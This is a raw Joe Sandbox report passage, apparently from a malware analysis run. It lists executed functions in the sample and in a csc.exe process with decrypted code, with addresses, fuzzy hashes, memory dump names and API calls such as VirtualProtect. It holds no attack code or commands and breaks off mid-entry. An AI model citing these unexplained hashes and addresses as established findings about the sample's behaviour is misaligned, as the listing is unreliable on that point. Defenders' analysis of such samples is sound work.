Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: HookTerminateThreadUnhookWindows
String ID: j-
API String ID: 2600959829-2063475733
Opcode ID: 5bb516bec8b447ffe7ded87fbeca1cf8001a7f0f38593c33aaa1dedb19c27621
Instruction ID: 9bebffadc36f05f1a7e5baa52b1f3811f4342a6a62f17febb9ef87cf65c7ed80
Opcode Fuzzy Hash: 5bb516bec8b447ffe7ded87fbeca1cf8001a7f0f38593c33aaa1dedb19c27621
Instruction Fuzzy Hash: 9CE062706426909ED795DB74ED497573BD4A7AD30DF040479A100D76A0D77CE454CB4C

Function 00403314 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,0049D810), ref: 0040331B
GetCommandLineA.KERNEL32(00000000,0049D810), ref: 00403326

Strings

h'e, xrefs: 0040332B

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: CommandHandleLineModule
String ID: h'e
API String ID: 2123368496-1587045432
Opcode ID: bccabb80cb5bad8c0c20631be995abe124fdac404283a54cec7e04c669414f53
Instruction ID: 60ec43bad8057e1918ee6d40defc66cd34b73dfe82e33f26ecd6b12b36965444
Opcode Fuzzy Hash: bccabb80cb5bad8c0c20631be995abe124fdac404283a54cec7e04c669414f53
Instruction Fuzzy Hash: C9C0126491A2048AD750FFB6A8027043D90A702309F8040BFA008BA2E2C67C82019B9E

Function 00401B4D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 8COMMON

Download Yara Rule

APIs

RtlLeaveCriticalSection.KERNEL32(\$,00401B4F), ref: 00401B38
RtlDeleteCriticalSection.KERNEL32(\$,00401B4F), ref: 00401B42

Strings

\$, xrefs: 00401B33, 00401B3D

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: CriticalSection$DeleteLeave
String ID: \$
API String ID: 794802610-2346321534
Opcode ID: 7c6e4f108533aff5a22c0c009fc0b09869d4c71b9c3d578fbe18dfc4623961bf
Instruction ID: 2f402163083bc7c0f5f2fe0ca4098cf1a912d75a059c5ca0e26312fe1cd8fbef
Opcode Fuzzy Hash: 7c6e4f108533aff5a22c0c009fc0b09869d4c71b9c3d578fbe18dfc4623961bf
Instruction Fuzzy Hash: 24B09204A4824420E62672E11806B962CA027AE70CFA5107BA500348F336BC2004C12E

Analysis Process: csc.exePID: 6536, Parent PID: 6460COMMON

Execution Graph

Execution Coverage:	13.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	37
Total number of Limit Nodes:	3

Executed Functions

Function 09B903C7 Relevance: 2.4, Strings: 1, Instructions: 1140COMMON

Download Yara Rule

Strings

4, xrefs: 09B90DAD

Memory Dump Source

Source File: 00000003.00000002.4660063366.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9b90000_csc.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: 556de9b77a0b0b26aa8d9215ddebc823079a782c8f2e822ac85b8b078c6c9d03
Instruction ID: 0ba586957559bf073e4435b9b700dadfe57510fbb4d4cda33683202b4177bf80
Opcode Fuzzy Hash: 556de9b77a0b0b26aa8d9215ddebc823079a782c8f2e822ac85b8b078c6c9d03
Instruction Fuzzy Hash: A9B2E434A10219DFDB14DFA8C894BADB7B6FF88710F1581A9E505AB2A5DB70EC81CF50

Function 09B906FF Relevance: 1.7, Strings: 1, Instructions: 495COMMON

Download Yara Rule

Strings

4, xrefs: 09B90DAD

Memory Dump Source

Source File: 00000003.00000002.4660063366.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9b90000_csc.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: 28eaf72d064232c6b48bff8faec8fe13265b9a8d9a115005821e17c80edcef48
Instruction ID: 19dedf6bec7ec8c4f0f62460da29b3a5041604e7f94e7dd38940678c173fc619
Opcode Fuzzy Hash: 28eaf72d064232c6b48bff8faec8fe13265b9a8d9a115005821e17c80edcef48
Instruction Fuzzy Hash: 4B220934A10219DFDF24DF64C984BA9B7B5FF88714F1480E9E909AB2A5DB709D81CF50

Function 09CE26F8 Relevance: 1.7, APIs: 1, Instructions: 162
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 09CE280E

Memory Dump Source

Source File: 00000003.00000002.4660609742.0000000009CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9ce0000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 375403d67e3d4075ab64fef47eae5ec6a0317021cfc8003d9f22b37f31bc2b03
Instruction ID: 6fa5a3e21d218ae218e5b5a00b2e9786a7955cf886256360ea5e386168c7e303
Opcode Fuzzy Hash: 375403d67e3d4075ab64fef47eae5ec6a0317021cfc8003d9f22b37f31bc2b03
Instruction Fuzzy Hash: 3C61A831E05209CFEB24CF65E5587AD33BAFB88315F154079E027AB690CBB49E81CB45

Function 09CE24A8 Relevance: 1.7, APIs: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 09CE2557

Memory Dump Source

Source File: 00000003.00000002.4660609742.0000000009CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9ce0000_csc.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: f9ce72782ec096c443accc5827e45976b8e790512b34cfdbf4e986246c447dce
Instruction ID: ccff54b61d3d0086be2207b3cfcad0b08fe160e1e943d9dfa0afcc223739d64a
Opcode Fuzzy Hash: f9ce72782ec096c443accc5827e45976b8e790512b34cfdbf4e986246c447dce
Instruction Fuzzy Hash: C3518B31B052418FC758EB68E095B6A33EAEB8C322F4651A9D04BCB7D6CEB49D41C791

Function 09CE24B8 Relevance: 1.6, APIs: 1, Instructions: 140
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 09CE2557

Memory Dump Source

Source File: 00000003.00000002.4660609742.0000000009CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9ce0000_csc.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 65f4035ed685fff60d0f747b1f3a5715c6b770530575c45c65391a9702ffc4ea
Instruction ID: 0d7efc5b00a60de4f9b81f6bdca41a3670376cbbfcca036c83e7d1e312076722
Opcode Fuzzy Hash: 65f4035ed685fff60d0f747b1f3a5715c6b770530575c45c65391a9702ffc4ea
Instruction Fuzzy Hash: 5F515B31B052418FC658EB78E095B6A33EAEBCC322B4655A9904BCB796CEB09D41C791

Function 09BA236B Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660463409.0000000009BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9ba0000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d4567a9f175c020104d79031d99b402cc1e3eb419721c2c22e39c8786dd48c6
Instruction ID: 302aa15c498c14ec4c2be9eefd18f2b3b1f8408f35e1e56d433f64ef63cb4d95
Opcode Fuzzy Hash: 3d4567a9f175c020104d79031d99b402cc1e3eb419721c2c22e39c8786dd48c6
Instruction Fuzzy Hash: B5F11C34A04219DFDB14DF28C994AA9B7B2FF88710F5585D9D91AAB361DB30ED81CF40

Function 09BA8EB8 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660463409.0000000009BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9ba0000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d64e54b30e6c5de147605129d432b17dac29188448cdf01945775d80eded032f
Instruction ID: e9a5d276fc67ae2f4795c8b3608285f2c4b724ea369b78eaacd8e10ae86b82e9
Opcode Fuzzy Hash: d64e54b30e6c5de147605129d432b17dac29188448cdf01945775d80eded032f
Instruction Fuzzy Hash: 82919E30A0920ACFEB14CF55D444BEEB7F3FB88321F1481A5E405ABA95D775AE85CB90

Function 09BA8EA9 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660463409.0000000009BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9ba0000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fd9b757657054f30bd989bb66626fb75110f27554dba46bcb32615501fcb5dd
Instruction ID: 8cde2014a99cd2df14249861f9db9633b60c146930ba566c25b4131eb7c5ee41
Opcode Fuzzy Hash: 7fd9b757657054f30bd989bb66626fb75110f27554dba46bcb32615501fcb5dd
Instruction Fuzzy Hash: B991BD30A0920ACFEB14CF55D544BEEB7B3FB88320F1485A5E405ABA85D775AE85CB90

Function 09BA8FC7 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660463409.0000000009BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9ba0000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0cc99cc8b7ab69a4b9eec5d4ed50c2989ee63de6a2e00626a2ec47b7edb4358
Instruction ID: c8e539660c53a23bb831d2b6d43ce1e90a9f7228a3b8a34cf2386095e93065c0
Opcode Fuzzy Hash: f0cc99cc8b7ab69a4b9eec5d4ed50c2989ee63de6a2e00626a2ec47b7edb4358
Instruction Fuzzy Hash: 7F81AE30A0920ACFEB14CF55D444BEEB7B3FB88320F1481A5E405ABA85D775AE85CB50

Function 09BA1950 Relevance: 1.9, Strings: 1, Instructions: 659
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

2, xrefs: 09BA1F28

Memory Dump Source

Source File: 00000003.00000002.4660463409.0000000009BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9ba0000_csc.jbxd

Similarity

API ID:
String ID: 2
API String ID: 0-450215437
Opcode ID: d89e7073f5d9754f9d69ccad3eb64da38e72414976a3174ab9fc90cd7fbcf684
Instruction ID: 810d95b62e268f1386c094a1ae3caf3319a19c52652963789dcf18b07fb716d0
Opcode Fuzzy Hash: d89e7073f5d9754f9d69ccad3eb64da38e72414976a3174ab9fc90cd7fbcf684
Instruction Fuzzy Hash: 87523A70A05205DFDB54DF68C994BADBBF2EF88310F1085AAE50AAB395DB309D81CF51

Function 09CE2708 Relevance: 1.7, APIs: 1, Instructions: 152
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 09CE280E

Memory Dump Source

Source File: 00000003.00000002.4660609742.0000000009CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9ce0000_csc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dbab8d4d5e0163091f1ffa11a324998d0bf85dc7444e5c02a7f1773a78a7b1de
Instruction ID: 634dc025372312c8563ffa16d0f19bd5d4dc908376bd1f0c54b25366574e3675
Opcode Fuzzy Hash: dbab8d4d5e0163091f1ffa11a324998d0bf85dc7444e5c02a7f1773a78a7b1de
Instruction Fuzzy Hash: 58518831E05209CFEB24CB65E5547A973BBFB88315F154079E0279B690CBB49E81CB45

Function 09CE2842 Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.4660609742.0000000009CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9ce0000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8b23dacd844bf81d7dd5328f626bfa05e3eb775e21bf5d14a89480dbe2d8b78
Instruction ID: 434c5e99c7069bfe8ece9f5ed5d82af667d38db4543735d6a7cf94b4c104ac2e
Opcode Fuzzy Hash: e8b23dacd844bf81d7dd5328f626bfa05e3eb775e21bf5d14a89480dbe2d8b78
Instruction Fuzzy Hash: 0E416A31E05209CFEB20CF60E559BA937BBFB88315F255078E1239B695CBB49E81CB45

Function 0715F758 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0715F7CC

Memory Dump Source

Source File: 00000003.00000002.4658028324.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7150000_csc.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1e0f4fe62d13fe537850fe91cd4b6ec3eefbae70e74cc989d78eb7acb4e92771
Instruction ID: 1fd25258243029934001cfe8d09b1426b6c1990845e4182ef6d6776fc536a673
Opcode Fuzzy Hash: 1e0f4fe62d13fe537850fe91cd4b6ec3eefbae70e74cc989d78eb7acb4e92771
Instruction Fuzzy Hash: 3711F7B1D002499FDB10DFAAC484BAEFBF5FF88720F14841AE519A7250C7759941CFA5

Function 0715F908 Relevance: 1.3, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE ref: 0715F96A

Memory Dump Source

Source File: 00000003.00000002.4658028324.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7150000_csc.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: e47c0cb0e0f71f2fdca03ce714a8d15c3398e8812a8a34f4d641979c2eaae96e
Instruction ID: 543dfff23a36d5eeebbfe3b092257f0b12601473337b5eb1f1e7894e3daee896
Opcode Fuzzy Hash: e47c0cb0e0f71f2fdca03ce714a8d15c3398e8812a8a34f4d641979c2eaae96e
Instruction Fuzzy Hash: 231158B18003498FDB10DFAAC4457AEFBF4AB88624F248419D559A7240CB39A540CB94

Function 09BA4D19 Relevance: 1.3, Strings: 1, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

W^9+, xrefs: 09BA4D4C

Memory Dump Source

Source File: 00000003.00000002.4660463409.0000000009BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9ba0000_csc.jbxd

Similarity

API ID:
String ID: W^9+
API String ID: 0-3011813191
Opcode ID: 487eeb206e09eb4393ee88e7ca291018d605a21788647a48d8ad5cd18fa10fab
Instruction ID: f67c1b1c8a64866d36c7bc47cca35d900a224536506cc8959329c1c5815d42e8
Opcode Fuzzy Hash: 487eeb206e09eb4393ee88e7ca291018d605a21788647a48d8ad5cd18fa10fab
Instruction Fuzzy Hash: 33F0B770A02206CFCB58CF68D095AAA7BF5FB49301F51446DA40ADB691DB75AD42CF84

Function 09B93080 Relevance: .5, Instructions: 534
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.4660063366.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9b90000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 761086aa185cbb3d2e4446a78de9cdbee763cc7ef75124345948adbd6e35600c
Instruction ID: ade5b885b2fc345ca3189a501e965a2244439773b5ed3e1c2dcf40eb54e61172
Opcode Fuzzy Hash: 761086aa185cbb3d2e4446a78de9cdbee763cc7ef75124345948adbd6e35600c
Instruction Fuzzy Hash: 78228D31B202159FDB14DF69C494AADB7F2FF88720F1580A9E9059B3A5DB71EC81CB90

Function 09B92491 Relevance: .5, Instructions: 521
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.4660063366.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9b90000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df77447410ed7f1295b4749cbad70813ef8da93f00b0680b8db4fd8584593564
Instruction ID: fc1cd42873e433c6fa17225457e3698c7c615d6e8cb24c967b803e99bb3e83dd
Opcode Fuzzy Hash: df77447410ed7f1295b4749cbad70813ef8da93f00b0680b8db4fd8584593564
Instruction Fuzzy Hash: 8D227F34E1021ADFDF15CFA4D844AAEBBB5FF88710F148069E921AB395DB349942CF91

Function 09B96B40 Relevance: .5, Instructions: 479COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660063366.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9b90000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56bbf89ee88778d7f490ad84141e39fdf96394bc77a8231815594819746b55fe
Instruction ID: 351b5c66f0c40e0684aca7f4df453fbe309bded24be9a3f4143491341d799b48
Opcode Fuzzy Hash: 56bbf89ee88778d7f490ad84141e39fdf96394bc77a8231815594819746b55fe
Instruction Fuzzy Hash: F5124631A20605DFDB24DFA5C894AAEB7F2FF88710F14856DE5069B394DB31AC46CB90

Function 09B94980 Relevance: .5, Instructions: 465COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660063366.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9b90000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 798c9c594de3154a2f7e419dfbd2056ff5b52cbcf0256b8ec63dfd3426d224ef
Instruction ID: 3210d0084202b9d9f12c15076d4302ca2f2a539a0ebff04aa6db5efb7cd96d5e
Opcode Fuzzy Hash: 798c9c594de3154a2f7e419dfbd2056ff5b52cbcf0256b8ec63dfd3426d224ef
Instruction Fuzzy Hash: D2F1D2307242568FEF199F69840427EBBE3EF99750F1449BAE546CB3A4DB34CC828B51

Function 09B9DA28 Relevance: .4, Instructions: 437COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660063366.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9b90000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b10b921c74bb68726f41bcb889db3e95670ab5856e3fc97e76f99964963a6b87
Instruction ID: c49aee541dd44333ffb7510b1b1144f1913093d1a51000f13273a79988638a40
Opcode Fuzzy Hash: b10b921c74bb68726f41bcb889db3e95670ab5856e3fc97e76f99964963a6b87
Instruction Fuzzy Hash: CF12E834A202198FCB14EF64C894B9DB7B2FF89310F5195A8E549AB395DF70ED86CB40

Function 09B93AC8 Relevance: .4, Instructions: 404COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660063366.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9b90000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5413d3d667cc20a2b72a445297fc045ff61665019217bae0f71a5ad89883a75
Instruction ID: 421e4b169f7c8fb675a176ee3ef4f50c97832ef71a422fb53420affdbbd66731
Opcode Fuzzy Hash: c5413d3d667cc20a2b72a445297fc045ff61665019217bae0f71a5ad89883a75
Instruction Fuzzy Hash: B0F12734B206098FDF14DF29C554A6AB7F6EF89721B2584B9E406CB3A5DB31DC82CB11

Function 09B97A08 Relevance: .4, Instructions: 404COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660063366.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9b90000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b59d0c0af596250fc4e3e2a1ef1bb0a8e23d486dfdc332f6c7f67e96f4f1388f
Instruction ID: 7cdd7840e41e72a0d06bbd39229d007f19a54c585cad441b877697ee4c21fede
Opcode Fuzzy Hash: b59d0c0af596250fc4e3e2a1ef1bb0a8e23d486dfdc332f6c7f67e96f4f1388f
Instruction Fuzzy Hash: 3AD12A32A10115DFDB19CF64C844A99BBB6FF88310F0544A8E609AB272DB32ED56DF90

Function 09B98400 Relevance: .4, Instructions: 370COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660063366.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9b90000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f151cedaec8f0c25a04fd74b8eadbdbc73f5ca39d0219d04fb91576bc40a6527
Instruction ID: 8f682921dbc08170374451c78d7d0922a9aa94150d79e6b683f5552fea3ef360
Opcode Fuzzy Hash: f151cedaec8f0c25a04fd74b8eadbdbc73f5ca39d0219d04fb91576bc40a6527
Instruction Fuzzy Hash: 05F1EA34A20219DFCB04DFA4D998A9DBBB2FF89310F119569E505AB3A5DB70EC42CF41

Function 09B9E108 Relevance: .4, Instructions: 363COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660063366.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9b90000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20a2e65b387e1e24f1cebae35f517085029a2154291abdefd68e2b5409204ac9
Instruction ID: 24d6c16911b9e6a97999c4f03c68474f25c001ba96c62c2e7ca5c91089135668
Opcode Fuzzy Hash: 20a2e65b387e1e24f1cebae35f517085029a2154291abdefd68e2b5409204ac9
Instruction Fuzzy Hash: 78E14334A20209DFDB14DFA4D4949ADBBB2FF89310F158569E405AB3A4DF30EC86CB91

Function 09B93808 Relevance: .3, Instructions: 291COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660063366.0000000009B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9b90000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cda557d5240619401613b717d4ead88b65ffed5f7f8dc51fff575c88953bff09
Instruction ID: d732db02d088fb3c8773ae46e5932fc36d7330f158814f22f6b4acc6ae4d769b
Opcode Fuzzy Hash: cda557d5240619401613b717d4ead88b65ffed5f7f8dc51fff575c88953bff09
Instruction Fuzzy Hash: 6DB1F334B101058FDB14DF69C494AAE7BF6EF89710B1144A9E506CB3B5DB71EC42CBA1

Function 09BA4DC8 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4660463409.0000000009BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9ba0000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfc0f32b9b352416d5a39b685068c4caa4af1d4aefe3c1f2187c77bd7e1d4259
Instruction ID: 81df8f93298f9b54f119be20a49e9b790ecc241d7c88ea99841c313b906d6a9d
Opcode Fuzzy Hash: dfc0f32b9b352416d5a39b685068c4caa4af1d4aefe3c1f2187c77bd7e1d4259
Instruction Fuzzy Hash: 18B19C306016049FD728DF69D484AADBBF6FF89710F2181ADE405AB3A6DB71EC41CB94

Function 09B9B538 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

